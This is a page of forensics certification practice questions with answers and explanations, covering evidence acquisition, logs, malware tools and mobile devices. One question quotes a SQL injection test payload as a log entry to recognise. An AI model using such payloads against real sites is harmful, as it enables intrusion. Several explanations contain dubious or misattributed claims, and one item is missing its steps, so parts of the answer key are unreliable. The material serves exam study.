A.Power off the system and remove only the drive with the operating system
B.Disconnect all drives and image a logical volume after the RAID controller
C.Image each physical drive individually using a write blocker
D.Rebuild the array in a different system and then image
AnswerC

This preserves each drive's contents without modification, maintaining the ability to reconstruct the array.

Why this answer

Option C is correct because imaging each physical drive individually with a write blocker preserves the exact bit-for-bit state of every disk in the RAID array, including metadata, parity, and superblock information. This approach ensures that the logical volume can be reconstructed later in a controlled environment without altering the original evidence, which is critical for maintaining chain of custody and forensic integrity.

Exam trap

EC-Council often tests the misconception that imaging a logical volume or rebuilding the array is acceptable, but the trap here is that any operation that allows the RAID controller or OS to write to the drives (even during a read) can alter evidence, making individual physical imaging with a write blocker the only forensically sound method.

How to eliminate wrong answers

Option A is wrong because removing only the operating system drive from a RAID array destroys the array's configuration and may cause the controller to mark the remaining drives as degraded or foreign, potentially overwriting critical metadata. Option B is wrong because imaging a logical volume after the RAID controller introduces the risk of the controller altering data during read operations (e.g., on-the-fly parity recalculation or bad block remapping), and it does not capture the physical state of each drive, which may be needed for parity analysis or recovery of deleted data. Option D is wrong because rebuilding the array in a different system can trigger automatic synchronization or reconstruction processes that modify data on the drives, thereby contaminating the evidence and violating forensic best practices.

573
MCQhard

A forensic examiner is analyzing an Android device that has been factory reset. Which of the following artefacts is MOST likely to still be recoverable from the device's flash memory after a factory reset, assuming no overwrite has occurred?

A.The GUID Partition Table (GPT)
B.The device's encryption keys
C.The Android OS system files
D.User data such as photos and contacts
AnswerD

User data may be recoverable from unallocated space after a factory reset if not overwritten.

Why this answer

After a factory reset on an Android device, the operating system typically performs a 'fastboot format' or 'wipe data/factory reset' which only unmounts the userdata partition and marks its blocks as free in the ext4 or F2FS filesystem metadata. The actual user data (photos, contacts, etc.) remains physically stored in the NAND flash memory until those blocks are overwritten by new data. Because no overwrite has occurred in this scenario, the raw data is still recoverable using forensic tools that bypass the filesystem and read the flash memory directly.

Exam trap

EC-Council often tests the misconception that a factory reset securely erases all data, when in fact it only removes filesystem pointers, leaving the underlying data recoverable until overwritten.

How to eliminate wrong answers

Option A is wrong because the GUID Partition Table (GPT) is stored in the boot partition area (LBA 1–34) and is not erased or affected by a factory reset; it remains intact and is not a user-data artifact. Option B is wrong because encryption keys are stored in the device's dedicated hardware-backed keystore (e.g., Trusted Execution Environment or StrongBox) and are securely wiped or invalidated during a factory reset, making them unrecoverable. Option C is wrong because Android OS system files reside in the system partition, which is read-only and not modified by a factory reset; they are not user data and are not the target of recovery in this context.

574
MCQmedium

A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

A.Remote file inclusion
B.Path traversal
C.SQL injection
D.Cross-site scripting (XSS)
AnswerC

The payload 1' OR '1'='1 is a standard SQL injection test to manipulate queries.

Why this answer

The pattern 1' OR '1'='1 is a classic SQL injection payload attempting to bypass authentication or extract data. The single quote and OR condition are characteristic of SQLi.

575
Multi-Selecthard

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

Select 2 answers
A.Using docker logs command to retrieve container logs
B.Using docker inspect to get log configuration
C.Copying log files from the container using docker cp
D.Using docker exec to run syslog inside the container
E.Using docker image to view the image layers
AnswersA, C

docker logs fetches the container's console output.

Why this answer

The 'docker logs' command captures container stdout/stderr, and the 'docker cp' command can copy log files from the container filesystem. Other methods are not directly applicable.

576
Drag & Dropmedium

Drag and drop the steps to perform a forensic examination of a mobile device (Android) using Cellebrite UFED into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Mobile forensics requires enabling debugging, selecting extraction method, and parsing data.

577
MCQhard

During a forensic investigation, a first responder notices that a computer is running and suspects that volatile data may be present. According to best practices, what should the responder do to preserve the most volatile data first?

A.Perform a graceful shutdown to avoid data corruption
B.Remove the hard drive immediately while the system is running
C.Capture the contents of RAM using a forensic tool, then shut down
D.Immediately unplug the power cord to freeze the system state
AnswerC

This preserves the most volatile data first.

Why this answer

Option C is correct because volatile data, such as the contents of RAM, is lost when power is removed. The first responder must capture this data using a forensic tool (e.g., FTK Imager, WinPmem, or LiME) before performing a shutdown. This follows the Order of Volatility (RFC 3227), which prioritizes capturing registers, cache, and RAM before any persistent storage.

Exam trap

The trap here is that candidates often confuse 'preserving data integrity' with 'avoiding corruption' and choose a graceful shutdown (Option A), not realizing that the shutdown process itself destroys the most volatile evidence.

How to eliminate wrong answers

Option A is wrong because a graceful shutdown allows the operating system to overwrite or clear volatile data (e.g., memory pages, temporary files, and encryption keys) during the shutdown process, destroying potential evidence. Option B is wrong because removing the hard drive while the system is running can cause electrical damage to the drive and controller, and it does not preserve RAM; the volatile data in memory is lost immediately when power is interrupted. Option D is wrong because immediately unplugging the power cord causes an abrupt loss of power, which destroys all volatile data in RAM and cache, and may also cause filesystem corruption on the hard drive due to incomplete write operations.

578
MCQhard

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

A.They are both plain-text log files used for system monitoring
B.The diagnostics directory contains binary log data from the unified logging system
C.The diagnostics directory contains compressed archives of system.log
D.These locations are remnants of third-party security software
AnswerB

macOS unified logging stores binary logs in diagnostics, providing detailed forensic data.

Why this answer

The unified logging system in macOS stores log data in /private/var/db/diagnostics/ in a binary format, while /var/log/system.log is a legacy plain-text log. The diagnostics directory contains more detailed logs for forensic analysis.

579
MCQmedium

Which of the following is a significant challenge in cloud forensics compared to traditional digital forensics?

A.Inability to collect memory dumps
B.Multi-tenancy and data segregation
C.Lack of logging
D.Data volatility
AnswerB

Cloud environments share resources among multiple tenants, complicating evidence isolation.

Why this answer

Multi-tenancy in cloud environments means that evidence from one tenant may be co-mingled with data from other tenants, and isolation can be difficult.

580
MCQhard

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

A.General query log
B.Binary log
C.Slow query log
D.Error log
AnswerA

Logs every query, so exfiltration queries would be visible.

Why this answer

MySQL general query log logs all queries, but can be resource-intensive. Binary logs record changes. Error logs contain errors.

Slow query log logs slow queries. The general query log is best for seeing all queries from a compromised account.

581
Multi-Selecthard

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

Select 2 answers
A.The packet size is exactly 66 bytes, identical to other similar packets
B.Multiple similar SYN packets from 10.0.0.1 to many internal IPs on port 445
C.The source MAC address is from a well-known vendor
D.The packet contains a payload with the string "SMBv2"
E.The destination IP 203.0.113.5 is a known web server
AnswersA, B

Uniform packet sizes often indicate automated scanning tools versus legitimate traffic.

Why this answer

Worm propagation often scans many internal hosts on SMB port 445 (indicating lateral movement) and uses consistent payload sizes. A single SYN to an external IP on port 445 could be a normal file share connection. Internal scanning and similar packet sizes are indicative of automated worm behavior.

582
MCQhard

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

A.http.request
B.ip.proto == 6
C.tcp.port == 80
D.http
AnswerD

Wireshark's display filter 'http' captures all packets that contain HTTP protocol data.

Why this answer

The correct filter for HTTP traffic in Wireshark is 'http'. Wireshark uses protocol names in lowercase for display filters.

583
MCQmedium

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

A.The first 'Received' header at the top
B.The last 'Received' header at the bottom
C.The 'X-Originating-IP' header
D.The 'Return-Path' header
AnswerB

The bottom Received header is the closest to the sender's MTA, thus the most reliable for identifying the original source IP.

Why this answer

The lowest (last) 'Received' header in the email is the first hop from the sender's MTA, making it the most trustworthy for the originating IP.

584
MCQhard

A forensic investigator is analyzing a malware sample that appears to be packed. Using PEiD, the analyst detects an entropy value of 7.8 and the entry point section is named 'UPX0'. Which of the following tools should the analyst use NEXT to unpack the malware for static analysis?

A.UPX -d
B.Ghidra
C.Process Monitor
D.IDA Pro
AnswerA

The UPX tool with -d flag decompresses UPX-packed executables.

Why this answer

The presence of 'UPX0' as the entry point section name and an entropy value of 7.8 (very high, indicating compression or encryption) strongly suggests the malware is packed with UPX (Ultimate Packer for eXecutables). The correct next step is to use UPX with the -d (decompress) switch to unpack the binary, restoring the original executable for static analysis. This is a standard, reversible unpacking method that does not require dynamic analysis or disassembly of the packed stub.

Exam trap

EC-Council often tests the distinction between tools for unpacking versus tools for analysis, expecting candidates to recognize that UPX -d is the direct unpacking utility, while Ghidra and IDA Pro are analysis tools that require an already-unpacked binary for effective static analysis.

How to eliminate wrong answers

Option B (Ghidra) is wrong because Ghidra is a reverse-engineering framework for disassembly and decompilation, not a dedicated unpacking tool; attempting to analyze a packed binary in Ghidra without first unpacking it would yield obfuscated or compressed code, making static analysis ineffective. Option C (Process Monitor) is wrong because Process Monitor is a dynamic analysis tool for capturing real-time system activity (registry, file system, process/thread activity), not for unpacking or static analysis of a binary. Option D (IDA Pro) is wrong because IDA Pro is an interactive disassembler and debugger; while it can be used to analyze packed binaries with plugins, the immediate next step after detecting UPX packing is to use the UPX tool itself to decompress the file, as IDA Pro is not a dedicated unpacker and would still require unpacking first for effective static analysis.

585
MCQhard

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

A.A legitimate administrative tool for server management
B.A webshell allowing remote command execution
C.A backdoor installed via a SQL injection vulnerability
D.A malware dropper for deploying ransomware
AnswerB

The file accepts commands and executes them, classic webshell behavior.

Why this answer

A web shell is a script uploaded to a web server that allows remote command execution. The filename and behavior match a webshell.

586
MCQhard

During a forensic investigation, an analyst uses the following command: dd if=/dev/sda of=/mnt/evidence/image.dd bs=4096 conv=noerror,sync. What is the effect of the conv=noerror,sync option?

A.It verifies the integrity of the image using a hash algorithm
B.It ignores read errors and pads bad blocks with zeros in the output image
C.It creates a compressed image to save disk space
D.It enables logging of all I/O errors to a separate file
AnswerB

This is exactly what noerror (ignore errors) and sync (pad with zeros) do.

Why this answer

The `conv=noerror,sync` option in `dd` instructs the tool to continue processing even when a read error is encountered (`noerror`) and to pad the output block with zeros (`sync`) to maintain the correct block size and offset alignment. This ensures that the forensic image remains a bit-for-bit copy of the source device in terms of size and structure, with corrupted sectors replaced by zeros rather than causing the imaging process to abort or produce a truncated image.

Exam trap

Cisco often tests the misconception that `conv=noerror,sync` performs error correction or data recovery, when in fact it simply ignores errors and pads with zeros, which can lead to data loss if the analyst assumes the image is pristine.

How to eliminate wrong answers

Option A is wrong because `conv=noerror,sync` does not perform any hash verification; integrity verification is done separately using tools like `md5sum`, `sha1sum`, or `dd` with `conv=noerror` combined with a separate hash calculation. Option C is wrong because `dd` does not compress data; compression requires piping through `gzip` or using `conv=lz4` (if supported) or a separate compression tool. Option D is wrong because `dd` does not have a built-in logging feature for I/O errors; error logging must be implemented by redirecting stderr or using wrapper scripts.

587
MCQeasy

In the context of the US Fourth Amendment, what is typically required for law enforcement to seize a computer for forensic examination?

A.A subpoena duces tecum
B.No legal authorization is needed if the computer is in plain view
C.Consent of the owner, a warrant, or exigent circumstances
D.Only a warrant issued by a judge
AnswerC

These are common exceptions to the warrant requirement.

Why this answer

Option C is correct because the Fourth Amendment requires law enforcement to obtain a warrant based on probable cause, obtain the owner's consent, or demonstrate exigent circumstances before seizing a computer for forensic examination. This protects against unreasonable searches and seizures, and a computer's storage capacity means it can contain vast amounts of personal data, so the same constitutional protections apply as to a physical home or vehicle.

Exam trap

EC-Council often tests the misconception that a warrant is always required, ignoring that consent and exigent circumstances are equally valid legal bases for seizure without a warrant.

How to eliminate wrong answers

Option A is wrong because a subpoena duces tecum compels the production of documents or records, but it does not authorize law enforcement to physically seize a computer for forensic examination; it is a discovery tool, not a search warrant. Option B is wrong because the plain view doctrine only applies if the officer is lawfully present and the incriminating nature of the computer is immediately apparent, but it does not automatically permit seizing the device for a full forensic examination without a warrant or other exception. Option D is wrong because while a warrant is a common method, it is not the only method; consent and exigent circumstances are also valid exceptions under the Fourth Amendment.

588
MCQhard

During a malware analysis session, an analyst uses a tool to view the import address table (IAT) of a suspicious PE file. The tool shows imports from ws2_32.dll and wininet.dll. Which of the following tools would BEST allow the analyst to statically analyze the binary and view the IAT?

A.PEiD
B.Wireshark
C.Process Monitor
D.Cuckoo Sandbox
AnswerA

PEiD is a static analysis tool that can view imports, packers, and other PE header information.

Why this answer

PEiD (Portable Executable Identifier) is a static analysis tool that can parse the PE file structure, including the Import Address Table (IAT), to reveal which DLLs and functions are imported. Since the question specifies static analysis and viewing the IAT, PEiD is the best choice because it directly reads the PE headers without executing the file.

Exam trap

EC-Council often tests the distinction between static and dynamic analysis tools; the trap here is that candidates may confuse dynamic analysis tools (like Cuckoo Sandbox or Process Monitor) with static PE parsing tools, or mistake Wireshark for a binary analysis tool because it deals with network data.

How to eliminate wrong answers

Option B (Wireshark) is wrong because it is a network protocol analyzer that captures live traffic, not a static PE file analysis tool; it cannot parse the IAT of a binary. Option C (Process Monitor) is wrong because it is a dynamic monitoring tool that logs real-time system activity (registry, file system, process/thread) and does not perform static PE header analysis. Option D (Cuckoo Sandbox) is wrong because it is an automated dynamic malware analysis sandbox that executes the sample in an isolated environment, not a static analysis tool for viewing the IAT without execution.

589
MCQmedium

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

A.Prefetch files
B.Jump Lists
C.MRU lists in the registry
D.LNK files
AnswerC

MRU lists are registry keys that store recently accessed files for applications like Notepad and WordPad.

Why this answer

MRU lists are stored in the registry under NTUSER.DAT\(various keys such as \Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU). They track recently opened files.

590
MCQeasy

A first responder arrives at a crime scene where a computer is powered on and displaying a desktop. According to best practices, which of the following actions should the responder take FIRST?

A.Press Ctrl+Alt+Del to check for active user sessions.
B.Connect a write blocker and begin imaging the hard drive.
C.Unplug the power cord immediately to preserve volatile data.
D.Photograph the scene and the computer screen.
AnswerD

Documenting the scene photographically is the first step to preserve evidence context.

Why this answer

The first responder should photograph the scene and all visible evidence before any actions that might alter the state. This preserves a visual record of the original condition.

591
Multi-Selecthard

A first responder arrives at a crime scene where a computer is running. Which THREE actions should the first responder take to preserve volatile evidence?

Select 3 answers
A.Collect contents of RAM using a tool like FTK Imager or dd
B.Unplug the power cord immediately
C.Record active network connections using netstat
D.Run a full antivirus scan on the system
E.Photograph the screen to capture current state
AnswersA, C, E

Memory contains volatile data critical for investigation.

Why this answer

Option A is correct because RAM contains volatile data that is lost when power is removed. FTK Imager or dd can capture the exact contents of memory, preserving running processes, open network connections, encryption keys, and other transient evidence critical to the investigation.

Exam trap

EC-Council often tests the misconception that immediately cutting power is the safest action, but the trap is that this destroys the most volatile evidence (RAM) and can corrupt the filesystem, whereas a proper forensic response prioritizes capturing memory first.

592
MCQmedium

During a malware investigation, you find that a process named `svchost.exe` is making outbound connections to an IP address known to be malicious. What tool would be BEST to capture the network traffic for further analysis?

A.PEiD
B.Process Explorer
C.Regshot
D.Wireshark
AnswerD

Captures and analyzes network packets.

Why this answer

Wireshark is the best tool for capturing and analyzing network traffic because it can intercept packets at the network interface level, allowing you to inspect the full payload and headers of outbound connections from `svchost.exe` to the malicious IP. This enables deep analysis of protocols, data exfiltration attempts, and command-and-control communication patterns, which is essential in malware forensics.

Exam trap

EC-Council often tests the distinction between process analysis tools (like Process Explorer) and network analysis tools (like Wireshark), leading candidates to mistakenly choose Process Explorer because it can show network connections in its lower pane, but it cannot capture or inspect packet contents.

How to eliminate wrong answers

Option A is wrong because PEiD is a tool for detecting packers, cryptors, and compilers in executable files, not for capturing network traffic. Option B is wrong because Process Explorer is a process management and analysis tool that shows process details, handles, and DLLs, but it does not capture or analyze network packets. Option C is wrong because Regshot is a registry comparison tool used to detect changes made to the Windows registry, not for network traffic capture.

593
MCQhard

During an internal investigation, an employee is suspected of leaking sensitive data. The security team finds that the employee's computer has been turned off. Which of the following evidence types would be LOST due to the system being powered off?

A.System logs stored in the Event Viewer
B.Files stored on the hard drive
C.Registry hives
D.Contents of RAM and network connections
AnswerD

RAM and network state are volatile and lost on power loss.

Why this answer

Volatile data such as RAM contents, network connections, and running processes are lost when the system is powered off. Non-volatile data on the hard drive remains.

594
MCQeasy

Which mobile forensics tool is specifically designed for physical extraction of iOS devices, including bypassing passcodes and extracting full file system images?

A.Oxygen Forensic Detective
B.Magnet AXIOM
C.Cellebrite UFED
D.GrayKey
AnswerD

GrayKey is a dedicated iOS forensic tool capable of physical extraction and passcode bypass.

Why this answer

GrayKey is a specialized forensic tool developed by GrayShift that performs physical extraction on iOS devices, including bypassing passcodes and obtaining full file system images. It exploits hardware and software vulnerabilities in iOS to extract data, making it the correct choice for this specific task.

Exam trap

The trap here is that candidates often confuse Cellebrite UFED's broad device support with the specific ability to perform physical extraction and passcode bypass on iOS, but Cellebrite's iOS capabilities are more limited compared to GrayKey's specialized focus.

How to eliminate wrong answers

Option A is wrong because Oxygen Forensic Detective is a comprehensive forensic platform that supports logical and file system extractions for iOS, but it does not specialize in physical extraction or passcode bypass for iOS devices. Option B is wrong because Magnet AXIOM is a digital forensic tool that focuses on artifact analysis and logical extractions, not physical extraction or passcode bypass for iOS. Option C is wrong because Cellebrite UFED supports physical extraction for many devices, but for iOS, it primarily relies on logical extraction or using the device's backup, and does not consistently bypass passcodes for full physical extraction like GrayKey does.

595
MCQhard

During a forensic examination of a solid-state drive (SSD), the analyst notices that the TRIM command was enabled. What challenge does this pose for data recovery?

A.It erases data blocks immediately after deletion, preventing recovery
B.It causes fragmentation, making file recovery more complex
C.It causes the drive to encrypt data automatically
D.It physically destroys the NAND cells, making the drive unusable
AnswerA

TRIM notifies the SSD controller to erase blocks, making deleted data unrecoverable.

Why this answer

TRIM allows the SSD to erase data blocks immediately after deletion, making it impossible to recover data from those blocks using traditional file carving or undelete methods.

596
MCQmedium

During an investigation, an analyst recovers deleted files from an NTFS volume. She notices that some files have data hidden in a stream that is not visible in regular directory listings. This stream is associated with a file but not stored in the $MFT. Which NTFS feature is being used to hide the data?

A.Journaling in NTFS
B.Alternate Data Streams (ADS)
C.Extended attributes in ext4
D.Volume shadow copy
AnswerB

ADS allow hiding data in NTFS streams.

Why this answer

Alternate Data Streams (ADS) allow data to be attached to a file as a separate stream, invisible in standard directory listings.

597
MCQhard

During a forensic investigation, an analyst needs to acquire the contents of a live server's RAM without altering the evidence. Which tool and technique should the analyst use to minimize the footprint on the system?

A.Install FTK Imager on the server and capture memory to a network share
B.Run a trusted version of win32dd.exe from a write-protected USB drive and capture memory to the USB
C.Use a remote acquisition tool over SSH to capture memory to a remote server
D.Use the built-in task manager to create a memory dump and save it locally
AnswerB

Running from a write-protected USB minimizes changes; capturing to USB avoids writing to the system drive.

Why this answer

Option B is correct because running a trusted version of win32dd.exe (now commonly part of the Belkasoft or DumpIt suite) from a write-protected USB drive ensures the tool binary is not modified by the compromised system and does not write any artifacts to the server's disk. Capturing memory directly to the USB drive minimizes the forensic footprint by avoiding writes to the server's local storage, preserving the integrity of the evidence.

Exam trap

EC-Council often tests the misconception that installing forensic tools on a live system is acceptable, but the trap here is that any installation or local write (even to a network share) alters the evidence, whereas a write-protected USB with a trusted binary avoids contamination.

How to eliminate wrong answers

Option A is wrong because installing FTK Imager on the live server writes installer files and registry keys to the system, altering the evidence and violating the principle of minimal footprint. Option C is wrong because using a remote acquisition tool over SSH requires installing or running an agent on the server, which modifies the system state, and network capture may introduce latency or packet loss, compromising the integrity of the memory dump. Option D is wrong because the built-in task manager's memory dump (e.g., 'Create dump file') writes a large file to the local disk, overwriting free space and potentially destroying volatile evidence, and the tool itself is part of the untrusted OS, which may be compromised.

598
MCQmedium

A security analyst discovers a suspicious file on a Windows system with the hash 'd41d8cd98f00b204e9800998ecf8427e'. Which type of indicator of compromise (IoC) is this hash most commonly associated with?

A.Network indicator
B.Behavioural indicator
C.Registry key indicator
D.File hash indicator
AnswerD

File hashes (MD5, SHA1, SHA256) are used to uniquely identify known malicious files.

Why this answer

The hash 'd41d8cd98f00b204e9800998ecf8427e' is the MD5 hash of an empty file (zero bytes). In malware forensics, a file hash is a classic file-based indicator of compromise (IoC) used to uniquely identify known malicious files. Option D is correct because this hash directly identifies a specific file, making it a file hash indicator.

Exam trap

EC-Council often tests candidates' ability to distinguish between IoC types by presenting a well-known hash value, leading some to mistakenly classify it as a network or behavioural indicator due to its unusual appearance.

How to eliminate wrong answers

Option A is wrong because a network indicator refers to IP addresses, domain names, or URLs observed in network traffic, not a cryptographic hash of a file. Option B is wrong because a behavioural indicator describes actions or patterns of behaviour (e.g., process creation, registry modification) rather than a static file identifier. Option C is wrong because a registry key indicator involves Windows Registry paths or values, not a file hash.

599
MCQeasy

Which of the following is the primary purpose of using a hardware write blocker during disk acquisition?

A.To decrypt the drive during acquisition
B.To prevent any writes to the original evidence drive
C.To compress the acquired image
D.To increase the speed of the acquisition
AnswerB

This ensures the integrity of the evidence.

Why this answer

A hardware write blocker is a device placed between the suspect drive and the forensic workstation that intercepts and blocks any write commands from the host operating system, ensuring that the original evidence drive remains unaltered. This is critical for maintaining the integrity of digital evidence, as any modification to the source drive could render it inadmissible in court. The primary purpose is therefore to prevent any writes to the original evidence drive, preserving its exact state for forensic analysis.

Exam trap

EC-Council often tests the misconception that a write blocker performs active functions like decryption or compression, when in reality it is a passive hardware filter that only enforces read-only access at the bus level.

How to eliminate wrong answers

Option A is wrong because a hardware write blocker does not perform decryption; decryption requires separate tools or keys and is not a function of write-blocking hardware. Option C is wrong because compression of the acquired image is handled by imaging software (e.g., FTK Imager, dd with gzip) after the write blocker has ensured read-only access, not by the write blocker itself. Option D is wrong because a write blocker does not increase acquisition speed; in fact, it may introduce a slight latency due to the hardware bridge, and speed is determined by the interface (e.g., SATA, USB) and the imaging tool, not the blocker.

600
Multi-Selecteasy

Which TWO of the following are anti-forensic techniques used by malware to evade detection?

Select 2 answers
A.Packing
B.Logging errors
C.Timestomping
D.Encryption of communication
E.Creating mutexes
AnswersA, C

Packing compresses/obfuscates code to evade signature-based detection.

Why this answer

Packing is an anti-forensic technique that compresses or encrypts the malware's executable code, making static analysis difficult by obfuscating the original binary signature and strings. This allows malware to evade signature-based detection by antivirus and forensic tools until the packed code is unpacked at runtime.

Exam trap

Cisco often tests the distinction between anti-forensic techniques (which actively hide or destroy forensic evidence) and general security mechanisms (like encryption of communication) that do not directly target forensic artifacts.

Page 7

Page 8 of 14

Page 9